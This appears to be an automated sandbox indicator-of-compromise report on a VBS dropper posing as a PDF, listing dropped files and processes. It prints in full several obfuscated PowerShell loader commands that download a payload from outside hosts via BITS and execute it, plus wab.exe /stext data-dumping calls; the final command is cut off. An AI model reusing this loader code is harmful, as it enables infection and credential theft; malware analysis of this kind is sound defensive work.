IOC Report
docs24129178208014180901747_pdf_08012024000000.vbs

loading gif

Files

File Path
Type
Category
Malicious
docs24129178208014180901747_pdf_08012024000000.vbs
ASCII text, with CRLF line terminators
initial sample
malicious
C:\Users\user\AppData\Roaming\vorspt.dat
data
dropped
malicious
C:\ProgramData\Microsoft\Network\Downloader\edb.log
data
dropped
C:\ProgramData\Microsoft\Network\Downloader\qmgr.db
Extensible storage engine DataBase, version 0x620, checksum 0xb4ca4fe7, page size 16384, DirtyShutdown, Windows version 10.0
dropped
C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm
data
dropped
C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_bad_module_info_dcd3242e9fa4189184df4216daa4e4c7cdf1959_85207d7d_19c0e136-e795-4a8c-8d98-91194206ba9b\Report.wer
Unicode text, UTF-16, little-endian text, with CRLF line terminators
dropped
C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_bad_module_info_dcd3242e9fa4189184df4216daa4e4c7cdf1959_85207d7d_5c2c1573-def5-4530-9782-f6231d58cbf6\Report.wer
Unicode text, UTF-16, little-endian text, with CRLF line terminators
dropped
C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_bad_module_info_dcd3242e9fa4189184df4216daa4e4c7cdf1959_85207d7d_65ab8d0e-e459-4b7e-8470-23c86d3d1876\Report.wer
Unicode text, UTF-16, little-endian text, with CRLF line terminators
dropped
C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_bad_module_info_dcd3242e9fa4189184df4216daa4e4c7cdf1959_85207d7d_9835577c-e9cc-40e1-9779-6f0d3189d02c\Report.wer
Unicode text, UTF-16, little-endian text, with CRLF line terminators
dropped
C:\ProgramData\Microsoft\Windows\WER\Temp\WER3589.tmp.WERInternalMetadata.xml
XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
dropped
C:\ProgramData\Microsoft\Windows\WER\Temp\WER35A8.tmp.WERInternalMetadata.xml
XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
dropped
C:\ProgramData\Microsoft\Windows\WER\Temp\WER35E7.tmp.WERInternalMetadata.xml
XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
dropped
C:\ProgramData\Microsoft\Windows\WER\Temp\WER35F8.tmp.xml
XML 1.0 document, ASCII text, with CRLF line terminators
dropped
C:\ProgramData\Microsoft\Windows\WER\Temp\WER3675.tmp.xml
XML 1.0 document, ASCII text, with CRLF line terminators
dropped
C:\ProgramData\Microsoft\Windows\WER\Temp\WER36E3.tmp.xml
XML 1.0 document, ASCII text, with CRLF line terminators
dropped
C:\ProgramData\Microsoft\Windows\WER\Temp\WER4DA5.tmp.WERInternalMetadata.xml
XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
dropped
C:\ProgramData\Microsoft\Windows\WER\Temp\WER4E04.tmp.xml
XML 1.0 document, ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q8X2NUFH\json[1].json
JSON data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
data
dropped
C:\Users\user\AppData\Local\Temp\Alarmtils.vbs
ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Temp\WER257B.tmp.WERDataCollectionStatus.txt
Unicode text, UTF-16, little-endian text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Temp\WER259A.tmp.WERDataCollectionStatus.txt
Unicode text, UTF-16, little-endian text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Temp\WER25B9.tmp.WERDataCollectionStatus.txt
Unicode text, UTF-16, little-endian text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Temp\WER3D87.tmp.WERDataCollectionStatus.txt
Unicode text, UTF-16, little-endian text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bbinu2n3.pjp.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dylrllz1.nfa.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ea0px3tr.dw0.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_l0g0yo5s.wpm.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xwqzxfuh.ozj.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yp1exc31.5oh.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Roaming\BIT7E8B.tmp
ASCII text, with very long lines (65536), with no line terminators
dropped
C:\Users\user\AppData\Roaming\BITA28A.tmp
ASCII text, with very long lines (65536), with no line terminators
dropped
C:\Users\user\AppData\Roaming\Fejded.Ast (copy)
ASCII text, with very long lines (65536), with no line terminators
dropped
C:\Users\user\AppData\Roaming\Invultva.Bar (copy)
ASCII text, with very long lines (65536), with no line terminators
dropped
There are 25 hidden files, click here to show them.

Processes

Path
Cmdline
Malicious
C:\Windows\System32\wscript.exe
C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\docs24129178208014180901747_pdf_08012024000000.vbs"
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "Clear-History;Clear-History;Function Brdf ([String]$Pilgri){$Opregn = 5;For($Damperc=4; $Damperc -lt $Pilgri.Length-1; $Damperc+=$Opregn){ $Skotjsarbe4 = $Pilgri.Substring($Damperc, $Poler238); $Skotjsarbe=$Skotjsarbe+$Skotjsarbe4; }$Skotjsarbe;}$Poler238 = (cmd /c 'echo 1 && exit');$Skotjsarbe01=Brdf ' Hahi InieExpexNonl ';$Skotjsarbe02=Brdf 'HexaTBytmrSjusaGnidn OmdsPermfFleleGuldrgardr VesiMeacnCautg Aku ';$Afstand = Brdf 'enwo\UnamsViljyDubbspredwBrakohovewPaam6Subt4Faul\SpokWAtebiYndenHatcdBebyoergowAdmisAlfrPPotsoBambwGenreNonmradviSAbsoh KuheRobulGlomlTrac\ IndvHorn1Knok.Taxi0 Fun\ParapIndeoTretwDewbeBravrStorsDrikhToureUblalheftlSkum.Indse CraxCarneDyrk ';function nondec ($Hippolog){& ($Skotjsarbe01) ($Hippolog);}$Krimina93=Brdf 'BilahCatftCoontTrskp geo:Dmme/Para/Berl8ildf5 Ele.Swee2Unsh0Appt9Unwi.Card1Coor7livr6Efte.Both4Undi6Bery/ZygoS OffoClemo gastReflh KuliTomonstofgNomo.FrimhAtomhMrspkAsto>uprohBapttMisytSpalpMidd:wood/Stab/ChereElydc FaeoArkixskol.Brisp Bart Leu/RietSRaveo maho Klot KomhChefiBrnenHologBedu.CemehTilbhTidsk Epi ';$Stvsug=$Krimina93.split([char]62);$Krimina93=$Stvsug[0];nondec (Brdf 'Rune$TilvgBioglPhysodatabAfsla Till Asp:HaemDSniprSparebladdPartgTortiRestnMask2Tils=Twir$ Stre EpinVinavDebu:NudiwuseriOutnn Furd Numi overFjel ') ;nondec (Brdf 'Dmpe$DiapgTasslUnwioBrocbTheraSeanlSolk:MesiDDissrOutkeAmmodDkkegGgeliDousnGymn6Frav= Ade$DracDSelvr ThreDocidFintg EspiModunStal2Pigm+Auto$OverATrucf LydsMyldtSpatacrannIntedGenr ') ;nondec (Brdf ' Exp$TiergGranlUdgaoHissb SupaCierlKben:PrepDInderLimoeBarddVidegTroliEnnenBrun3Jazz Crop=ompo Lobb(Uroc(GeoggKundwEgebm SpeiSubl VetwMandi litnAgyn3Muld2 Tel_CorvpHalfr CoroBaskcSkjoeTrnes unbsSide Marg-RiflFSter PreoP StrrEmpro LarcSpireArtiskalksmatrI PladEqui=Anfg$Ress{DublPSuppI KulDEpic}Pens)Shad.ResiCSlseoGuttmOpbrmDamoa TurnLaridCoelLSmugiDessnDomaeskis)Char gob-SerpsLanup ReslNatuiPhlotSkip Kast[Saalc ElehUdmeaDelfrThon]Dosa3Xeno4Quay ');nondec (Brdf ' Sol$SpilgSigjlEskaoPiesbKodeaSkuelBier:RagsDInterIndde DikdSpregAfseiWarbnFnik4 Lig Worr=Echi Ope$PoleDProfr ReneReladOrgag Swai LignNone3Anti[Disc$ JubDkerbr Shee FridAtrigKlami grsnPaci3Rank.Unilc AktoDefouHibenSurntMess-Rome2Caye]Unef ');nondec (Brdf 'Najn$AndegOfftlRuskoUnirb BataSivalKali:EndoDSjusrEaseeIleodfremgDissiVolpnMult5Snee= Ste(SoftTPucke BelsMenitLovi-TotaPDysfaLopetOpsuhIndr Pol$ OvoDAlurrLegaeCantdSweegAbsui Arbnakva6Phyl)grun Nona- allASermnUndedpaab Arkt(arbe[shakI DisnChamtAxofPRavntSchfrEnog]Bide:Hand: Kies Reii AlkzNatseHexa Bidr- RejeBilgqSuff Boos8Skol)Slvs ') ;if ($Dredgin5) {& $Dredgin6 $Dredgin4;} else {;$Skotjsarbe00=Brdf 'Gest$SambgVildlAflgoUnlibCommaShanlbsts:RedeDHandrDetee PandSimigAnariEftenSnoo8Smel Pell=Woad SpuSUdvitkartaBemrr CortToma-JoseBInteiNervt EigsForfTPrior PeraTaxanTrylsTaktfDosieBojarKalo Fors-VasoSSillo HumuFrosr midcCopie Arm Tilb$ForkK ConrRodfiFibrmNonniProjnObsoaFana9fyld3Serv Klin-coloDklereMesasNonttNovaicambn hjsaPreltMyrsiBetaoberenJumb Mark$BlokDForerNonme BosdDecagNilmiApprn Pyr2Tsub ';nondec (Brdf 'Bedc$TricgCheclPreco LapbSpecaEjenlLoka:AnkeDBussrAnkeeWampdGerngQuoniBucknScol2Alca=Bicy$pyroePrisnaltiv Aer:ThuraAbolpChlopUdgidKompaAnnutHeteaSket ') ;nondec (Brdf 'nontIHomemLiftpDistobadlrNatitInju- RemM PitoRepadAareupolylmooreBevi BortBBliniStort ElesUforT BlarLiniaRepanAttrssttefCurvetrivrDode ') ;$Dredgin2=$Dredgin2+'\Invultva.Bar' ;nondec (Brdf 'Fish$ StigEpinlTelooprorb PykaCuralGlos: TidD Tvir AbbeKuvsdmonagstemiMedinTric7Flan=Troj(RnefTsepaeMahosGhantBill-ApokPMollaMdept OathPatr Dia$HeldDStenrtilbeSpurd IrogselviLjenn Ove2Sikk)saml ') ;while (-not $Dredgin7) {nondec (Brdf 'SousIUnplf tra Udtr(Over$BaraD HaurMobieSuicdColtg AnaiSupenAcro8Prec.TuetJCaulobrusbDobbSOxfot FloaDisctUnsaeTepa Alts-Denoekrabq Roo Yder$ CelS SorksnuroJaggtMopsjZonusGidsaconsr Casb NoneStor0Meje2Busl) Pht Spe{BoksSAnantHypoa TverNecktPost-AnlgSBonal PreeSusceCoappDdbi Udmn1 tro} GereIndslTurrs Sane Unp{FodbSTegntTeleaCargrSanbt Taw- EndS Fdel EveeKonkegigupBone Dgnk1Oils; mennOkseoTennnTeacdswiveSkancLepi Stil$SligSvagikUnzooVarvtToiljMenusSammaMcgurguanb Reve Whe0Flja0Kanh}Time ');nondec (Brdf 'Kild$BrasgDopilFremoAimibGrotaPrlulTilg:StnkD Godr Rine SamdDuctg ThriProtnNego7Rabb=Vitr(KaneTMicreMorms Undtouts-DresPTubeaInstt Sekh Ace Grnf$ParaD EmmrPlute SkadBlowgForsi Gran Mil2Jord)Somm ') ;$Krimina93=$Stvsug[$Udeholde++%$Stvsug.count];}nondec (Brdf 'Srin$Reexg GlylPentoSupebShepaSikkl Bra:VentMTornyFangr Valt LipaKomplOverrGanteUdensMona jazz=Pers coesGInteeEugltUdpa-VanrCSideoYerkn MaltJordeNotenSubttUnre Zulu$OvulD Toar InteLejedTelegAliciTorsnlati2Piff ');nondec (Brdf 'Inte$NedbgTilslEmolo Stib redaAfvrlBust:GasatAutoe Rubl Inio Ago Sal=Isba requ[portSengeycites Mitt SpeeBetam Pid.DuopC Paso ScrnHaugv Fore FulrcelitKldn] Gri: for: HaaFSrberHarmonoakmuvilBLifeaMikrs bereDest6Prej4BordSCoditMonorLauriAuktnkalig Int(Cond$BrndMAracyDoxorNonpt WidaRentl OrtrHoseeDactsOpsl)Sper ');nondec (Brdf ' Car$SkrigOranlNearoHemibYamma ProlRepr:buksSuntik StioAceltudenjChirsVldea ComrRetsbFungeGens2Chec Sout=Marm Vrt[ BleSMegayLibes Tilt GoneElevm Sca.StudT ArveShorxAktitRadi.CompEImidnSubtc GruoTrandBarriSubjnGlaugBevr]Bris:Mobs:MulsAStatSGenoCMikrI TroIAcce.AbanGnidue RestForsSDitet SerrTandifalhnRestgBejl(Viel$ManttUbode Socl SkioStor)Fond ');nondec (Brdf 'Offe$Udstg CoolUnheonewsbModeaForslUdeb: ChiSCarrk NonoBelmt ClijStivs EroaNontr RambHngeeNeur3kine=Affa$ConfS ProkVolioPeratKarsjMintsHydraFirerRaadbRekiebryn2Demi.Solms Oveu burbBndss GaltPaterSupri DennTurdgPlei(Nidi2Exoc5Eget8Misv2 Ter5chro1Spec,Salv1Plad8Flas8Conv1Sens7Gran)Conf ');nondec $Skotjsarbe3;};;
malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "Clear-History;Clear-History;Function Brdf ([String]$Pilgri){$Opregn = 5;For($Damperc=4; $Damperc -lt $Pilgri.Length-1; $Damperc+=$Opregn){ $Skotjsarbe4 = $Pilgri.Substring($Damperc, $Poler238); $Skotjsarbe=$Skotjsarbe+$Skotjsarbe4; }$Skotjsarbe;}$Poler238 = (cmd /c 'echo 1 && exit');$Skotjsarbe01=Brdf ' Hahi InieExpexNonl ';$Skotjsarbe02=Brdf 'HexaTBytmrSjusaGnidn OmdsPermfFleleGuldrgardr VesiMeacnCautg Aku ';$Afstand = Brdf 'enwo\UnamsViljyDubbspredwBrakohovewPaam6Subt4Faul\SpokWAtebiYndenHatcdBebyoergowAdmisAlfrPPotsoBambwGenreNonmradviSAbsoh KuheRobulGlomlTrac\ IndvHorn1Knok.Taxi0 Fun\ParapIndeoTretwDewbeBravrStorsDrikhToureUblalheftlSkum.Indse CraxCarneDyrk ';function nondec ($Hippolog){& ($Skotjsarbe01) ($Hippolog);}$Krimina93=Brdf 'BilahCatftCoontTrskp geo:Dmme/Para/Berl8ildf5 Ele.Swee2Unsh0Appt9Unwi.Card1Coor7livr6Efte.Both4Undi6Bery/ZygoS OffoClemo gastReflh KuliTomonstofgNomo.FrimhAtomhMrspkAsto>uprohBapttMisytSpalpMidd:wood/Stab/ChereElydc FaeoArkixskol.Brisp Bart Leu/RietSRaveo maho Klot KomhChefiBrnenHologBedu.CemehTilbhTidsk Epi ';$Stvsug=$Krimina93.split([char]62);$Krimina93=$Stvsug[0];nondec (Brdf 'Rune$TilvgBioglPhysodatabAfsla Till Asp:HaemDSniprSparebladdPartgTortiRestnMask2Tils=Twir$ Stre EpinVinavDebu:NudiwuseriOutnn Furd Numi overFjel ') ;nondec (Brdf 'Dmpe$DiapgTasslUnwioBrocbTheraSeanlSolk:MesiDDissrOutkeAmmodDkkegGgeliDousnGymn6Frav= Ade$DracDSelvr ThreDocidFintg EspiModunStal2Pigm+Auto$OverATrucf LydsMyldtSpatacrannIntedGenr ') ;nondec (Brdf ' Exp$TiergGranlUdgaoHissb SupaCierlKben:PrepDInderLimoeBarddVidegTroliEnnenBrun3Jazz Crop=ompo Lobb(Uroc(GeoggKundwEgebm SpeiSubl VetwMandi litnAgyn3Muld2 Tel_CorvpHalfr CoroBaskcSkjoeTrnes unbsSide Marg-RiflFSter PreoP StrrEmpro LarcSpireArtiskalksmatrI PladEqui=Anfg$Ress{DublPSuppI KulDEpic}Pens)Shad.ResiCSlseoGuttmOpbrmDamoa TurnLaridCoelLSmugiDessnDomaeskis)Char gob-SerpsLanup ReslNatuiPhlotSkip Kast[Saalc ElehUdmeaDelfrThon]Dosa3Xeno4Quay ');nondec (Brdf ' Sol$SpilgSigjlEskaoPiesbKodeaSkuelBier:RagsDInterIndde DikdSpregAfseiWarbnFnik4 Lig Worr=Echi Ope$PoleDProfr ReneReladOrgag Swai LignNone3Anti[Disc$ JubDkerbr Shee FridAtrigKlami grsnPaci3Rank.Unilc AktoDefouHibenSurntMess-Rome2Caye]Unef ');nondec (Brdf 'Najn$AndegOfftlRuskoUnirb BataSivalKali:EndoDSjusrEaseeIleodfremgDissiVolpnMult5Snee= Ste(SoftTPucke BelsMenitLovi-TotaPDysfaLopetOpsuhIndr Pol$ OvoDAlurrLegaeCantdSweegAbsui Arbnakva6Phyl)grun Nona- allASermnUndedpaab Arkt(arbe[shakI DisnChamtAxofPRavntSchfrEnog]Bide:Hand: Kies Reii AlkzNatseHexa Bidr- RejeBilgqSuff Boos8Skol)Slvs ') ;if ($Dredgin5) {& $Dredgin6 $Dredgin4;} else {;$Skotjsarbe00=Brdf 'Gest$SambgVildlAflgoUnlibCommaShanlbsts:RedeDHandrDetee PandSimigAnariEftenSnoo8Smel Pell=Woad SpuSUdvitkartaBemrr CortToma-JoseBInteiNervt EigsForfTPrior PeraTaxanTrylsTaktfDosieBojarKalo Fors-VasoSSillo HumuFrosr midcCopie Arm Tilb$ForkK ConrRodfiFibrmNonniProjnObsoaFana9fyld3Serv Klin-coloDklereMesasNonttNovaicambn hjsaPreltMyrsiBetaoberenJumb Mark$BlokDForerNonme BosdDecagNilmiApprn Pyr2Tsub ';nondec (Brdf 'Bedc$TricgCheclPreco LapbSpecaEjenlLoka:AnkeDBussrAnkeeWampdGerngQuoniBucknScol2Alca=Bicy$pyroePrisnaltiv Aer:ThuraAbolpChlopUdgidKompaAnnutHeteaSket ') ;nondec (Brdf 'nontIHomemLiftpDistobadlrNatitInju- RemM PitoRepadAareupolylmooreBevi BortBBliniStort ElesUforT BlarLiniaRepanAttrssttefCurvetrivrDode ') ;$Dredgin2=$Dredgin2+'\Invultva.Bar' ;nondec (Brdf 'Fish$ StigEpinlTelooprorb PykaCuralGlos: TidD Tvir AbbeKuvsdmonagstemiMedinTric7Flan=Troj(RnefTsepaeMahosGhantBill-ApokPMollaMdept OathPatr Dia$HeldDStenrtilbeSpurd IrogselviLjenn Ove2Sikk)saml ') ;while (-not $Dredgin7) {nondec (Brdf 'SousIUnplf tra Udtr(Over$BaraD HaurMobieSuicdColtg AnaiSupenAcro8Prec.TuetJCaulobrusbDobbSOxfot FloaDisctUnsaeTepa Alts-Denoekrabq Roo Yder$ CelS SorksnuroJaggtMopsjZonusGidsaconsr Casb NoneStor0Meje2Busl) Pht Spe{BoksSAnantHypoa TverNecktPost-AnlgSBonal PreeSusceCoappDdbi Udmn1 tro} GereIndslTurrs Sane Unp{FodbSTegntTeleaCargrSanbt Taw- EndS Fdel EveeKonkegigupBone Dgnk1Oils; mennOkseoTennnTeacdswiveSkancLepi Stil$SligSvagikUnzooVarvtToiljMenusSammaMcgurguanb Reve Whe0Flja0Kanh}Time ');nondec (Brdf 'Kild$BrasgDopilFremoAimibGrotaPrlulTilg:StnkD Godr Rine SamdDuctg ThriProtnNego7Rabb=Vitr(KaneTMicreMorms Undtouts-DresPTubeaInstt Sekh Ace Grnf$ParaD EmmrPlute SkadBlowgForsi Gran Mil2Jord)Somm ') ;$Krimina93=$Stvsug[$Udeholde++%$Stvsug.count];}nondec (Brdf 'Srin$Reexg GlylPentoSupebShepaSikkl Bra:VentMTornyFangr Valt LipaKomplOverrGanteUdensMona jazz=Pers coesGInteeEugltUdpa-VanrCSideoYerkn MaltJordeNotenSubttUnre Zulu$OvulD Toar InteLejedTelegAliciTorsnlati2Piff ');nondec (Brdf 'Inte$NedbgTilslEmolo Stib redaAfvrlBust:GasatAutoe Rubl Inio Ago Sal=Isba requ[portSengeycites Mitt SpeeBetam Pid.DuopC Paso ScrnHaugv Fore FulrcelitKldn] Gri: for: HaaFSrberHarmonoakmuvilBLifeaMikrs bereDest6Prej4BordSCoditMonorLauriAuktnkalig Int(Cond$BrndMAracyDoxorNonpt WidaRentl OrtrHoseeDactsOpsl)Sper ');nondec (Brdf ' Car$SkrigOranlNearoHemibYamma ProlRepr:buksSuntik StioAceltudenjChirsVldea ComrRetsbFungeGens2Chec Sout=Marm Vrt[ BleSMegayLibes Tilt GoneElevm Sca.StudT ArveShorxAktitRadi.CompEImidnSubtc GruoTrandBarriSubjnGlaugBevr]Bris:Mobs:MulsAStatSGenoCMikrI TroIAcce.AbanGnidue RestForsSDitet SerrTandifalhnRestgBejl(Viel$ManttUbode Socl SkioStor)Fond ');nondec (Brdf 'Offe$Udstg CoolUnheonewsbModeaForslUdeb: ChiSCarrk NonoBelmt ClijStivs EroaNontr RambHngeeNeur3kine=Affa$ConfS ProkVolioPeratKarsjMintsHydraFirerRaadbRekiebryn2Demi.Solms Oveu burbBndss GaltPaterSupri DennTurdgPlei(Nidi2Exoc5Eget8Misv2 Ter5chro1Spec,Salv1Plad8Flas8Conv1Sens7Gran)Conf ');nondec $Skotjsarbe3;};;
malicious
C:\Program Files (x86)\Windows Mail\wab.exe
C:\Program Files (x86)\windows mail\wab.exe
malicious
C:\Windows\SysWOW64\wscript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\Alarmtils.vbs"
malicious
C:\Program Files (x86)\Windows Mail\wab.exe
C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\karlogfpqegdwbunzzzvryidsvlysg
malicious
C:\Program Files (x86)\Windows Mail\wab.exe
C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\karlogfpqegdwbunzzzvryidsvlysg
malicious
C:\Program Files (x86)\Windows Mail\wab.exe
C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\karlogfpqegdwbunzzzvryidsvlysg
malicious
C:\Program Files (x86)\Windows Mail\wab.exe
C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\uuwwozqremyqyhqzqkuwclcubcchlrosb
malicious
C:\Program Files (x86)\Windows Mail\wab.exe
C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\fobop
malicious
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 7272 -ip 7272
malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "Clear-History;Clear-History;Function Arkivkopie ([String]$Kjende){$Forsvarl = 5;For($Treadl=4; $Treadl -lt $Kjende.Length-1; $Treadl+=$Forsvarl){ $Attributna4 = $Kjende.Substring($Treadl, $Dobbe); $Attributna=$Attributna+$Attributna4; }$Attributna;}$Dobbe = (cmd /c 'echo 1 && exit');$Attributna01=Arkivkopie 'UnsaiNdlgeGaffxSkim ';$Attributna02=Arkivkopie 'VrdiT PosrAmera Clin ProsPiwufBarne UderpsitrStyliTndenSoeggBetr ';$Pilgri = Arkivkopie 'Beas\KkkesNaivyHovesUdfrwXylooCorvwGran6 Hns4Sems\KoveWScreiHaabnSickdKaneoChanwdagdstrosPAlcoo Pusw FreeStrirbenzSUnslhBetoe isplForpl Kbe\Begav Pin1Forp. Del0 Irr\PipipwestoBopywSnipeFrosr Ords PrehStvleOblilBandlChur.Pinae VenxTagreLovk ';function Kultu ($Erefo){. ($Attributna01) ($Erefo);}$Cyan=Arkivkopie ' AarhOilmtRejstGrevpChef: sta/Illi/Sven8Dykn5Resa.Kowa2Dans0Dryp9Dood.Desp1Reto7Gaus6Outr.Pher4 Ite6Bran/AllicBatslisthiAfgin TeloRaad. FedtSammtAbasfMarc>Indhh digtOpvatBikepTher:Afro/Vral/TurieEnercFlyto AnixUnst.ProjpCalvtNoni/ FigcMrkelBaakiSwinnOrano Ope.BlootIntet MagfSemi ';$Anticata=$Cyan.split([char]62);$Cyan=$Anticata[0];Kultu (Arkivkopie 'deic$ErytgKlunlJuleoTempbUpspa ApylSpoo:ForlBVariuAnkun VultImprmUnuraCoungEwale DecrSbeoi Leb2Cont=Anci$Fibeewhisn MarvGiga:Neutw Mami ParnUdspdSkiliRillr Amb ') ;Kultu (Arkivkopie ' Cop$SuthgMerllMetaoCockbSkola AntlHamm:ParaB oveuSquinForptTeacmDesaaGldsgindkeClair AntiMudd6glan=Grip$SamfBGlykuKnetnDishtTilkmKlaraRopegphaneTilvr Nvni Ans2Mora+Unux$DehiP ValisjovlTorogIsacrAnaliOver ') ;Kultu (Arkivkopie 'Lang$HypsgMikllplanoRundbNonaa SuplBrev:UnifBDeliu GannBrantBarrmBoldaPostgPudre StarSingiFred3Bifo non=Sokk Inte(Ooph( UdggInfiwTohomLezeiSubk ParwHypiiWaltnSent3 Ver2Lind_ vetp tidrTestoAnticFjeneKvidsuddesVild Serv-ReliFSlid HomePMetarFagloBsnic ArteRapssgambsFarmIFishdbarr=Agen$Unde{KvajPMalaIDioxDanti} Eri)Opga.DeceCNgleoNienmrrelmPickaBygonTilgdTegnL BloiUpstnondeenoni)Brow post-Brkks GaapSjoflBreviForstUnsi Reco[ErincGrnlhObraaRydnrHydr]Fler3Fore4 kro ');Kultu (Arkivkopie ' Off$PlapgSammlOpdeoFortbCarraScrolSubi:HuggBBrutuDislnUskytAccomomraaTilfg RigeFigur FleiEmph4poik Dest=Kont dann$ NonB FriuGalanOffitabbemLystaKonsgFalleTrasr LaniWinn3 Fli[Slik$SpecBOmbruBaobnArrotYellmCykeaParegPreteSalirmisai Ink3Sphr.Theoc Klio Albu Uben NontTurn-Reve2Bloo]cham ');Kultu (Arkivkopie 'Satu$Foregnotel Vano SelbJuleaAftvlFink:DislBFiksuRusln AeqtpladmFernaVriegFrereMilorAirliOxhe5Cudd=Grns( mycT HydeFrassSammtMcki-VintPKancaAfiktlabohOver Hitt$ hypB FiluStyrn FertEvapmKloraTalegKlveeAilarDefeiBest6Udme)Synd Indb-FlagAVkstnSkyddGour Snrl(Makh[JensIRyddn CoetBlanPAttitMenurFeat]Midt:Oxho:incos BibiNyhezSimoeUdhv For-Tilse LocqIndg Nona8 Die)Sort ') ;if ($Buntmageri5) {& $Buntmageri6 $Buntmageri4;} else {;$Attributna00=Arkivkopie 'Odor$AlecgForklExteoGerhbToppaUdsklYdel:ParaBSmasuYestn VkktAppemKabiaPhaggBirteRundr CooiHjlp8Indo Fag=Gamb OverS Appt SplaIngrrTrantHofd- MilBCheliEpintOnkesEcotT SubrSkuna UnenCoursJugufBruge ManrMyoe Pre-GynaSDusioGouruFondrBolicMerveRupt Dast$blooCmesoyTaltaNaupnAlbi Stat-BrkjD RoyeCornsRaastNotciLevenstonaPolltOveri CafoSletnGlut Remo$PrurBExtruErytnHauntNabimHjtraUning TeceHexerYokiiPhon2Gene ';Kultu (Arkivkopie ' Nis$Provg ExclLibeoMarbb OcnaHerslSlov: MucBPseuuKvlnnopintElgemDustaCossgReddeSuperPlaniPram2Cent=Urov$FolleFilhnSulfvGang:AfhraCervpGoodpDribd skyaAfdrt AlvaTumo ') ;Kultu (Arkivkopie ' AkkIudstm tigpPeisoantirWikitNati- AguMChemoElecd FluuEmbulSubfeOdor GoorBbromiFisktGrips OveT crorHavdaSeminBryostetrfPneueEfterMelo ') ;$Buntmageri2=$Buntmageri2+'\Fejded.Ast' ;Kultu (Arkivkopie ' Bea$Schig AfdlBrakoCerab SabaKatalDrej:SkndBRecauMyconBlastphonmRestaAmoegOleoeramprSkyliNonr7Sten=Tryk(OperT tegeTreksInvatInka- AccP LufaCepht TekhProc Adap$GeodB Cceu arbnNicatOrdempatha FlygLease Konr VaniSaks2tele)Suff ') ;while (-not $Buntmageri7) {Kultu (Arkivkopie 'ForlIHoldfScio Korp(Empi$DelaBPyopuYorunDecitMalmmIncoaMucogmorteMylorEgnsiYder8fors. AflJintioGammbWheeSValitJespaStattsamme Sen Whis-AcaneNectq Cal Spli$ FanA Telt HemtlongrErhviAcrebMexiuHemitSlutn TilaHalt0Pdag2 Jin)Svin Morg{WindSOscit baraSmedrStiktMilj-BesgSKorrl SaneBundeKommp Ele Isin1Hjts}Forle ProlXenisHyboe Ric{IndmSInsktHyoeaKnoprbundtApri-CreeSbibel DomeOmdieEntyp Lig Anfg1Dosh;ScufKBalkuImpalLatit Carusamm fir$ProgAFiftt UnatLandr Liciadreb FrsuantitRejnnEsotaHaan0unfu0Frag}Yver ');Kultu (Arkivkopie 'Ente$SndagArbelBondoWiltbCessa DiglDgnp:DevoBmodsuBeninscantPidemRanaaVolagUndeeOutprAfbuitelo7Dist=Unin( PseTTelee OnyskrantWamp-PrasPForvaschetIntehSuml Trih$ GalBBerou PronChobtOvermSkiba ledgScapeLeucrPlasiNonr2Taxa) All ') ;$Cyan=$Anticata[$pinnigr++%$Anticata.count];}Kultu (Arkivkopie 'Jamm$ AcrgPhoslTyptoLazabkureaBrynl Kur:TangFModelcappiOverr afttPrueeDyreccheloTylelboks Verd=Taip ChanGshirefutitJean-RhegC UnloSeksnMangtSunne DeanSuppt Con Fuse$MagnBTalkuConsnChortriddmStifaFirmgLoggeGuaprAffiiPeac2Meri ');Kultu (Arkivkopie ' Byg$ MingThawlSkidoDelib HelaUnrilCalg:prinrNicheHusskNonilTownaProamSylf App= Mas Alt[ForgSElviyAnstsChrot RepeEngsmExal.LiccCEfteo PaunFlusvPadoe CrirVivitCise]Yuka:Visu:SoliFTcharSlumoNettmrengBDeklaArybsCorpeRadi6 Paa4RadiSManit FolrLegeiShegnaccegPale(sivs$GleyFKhaklfalhiDicorDisktWarveAralc Odio Musl Non)Disp ');Kultu 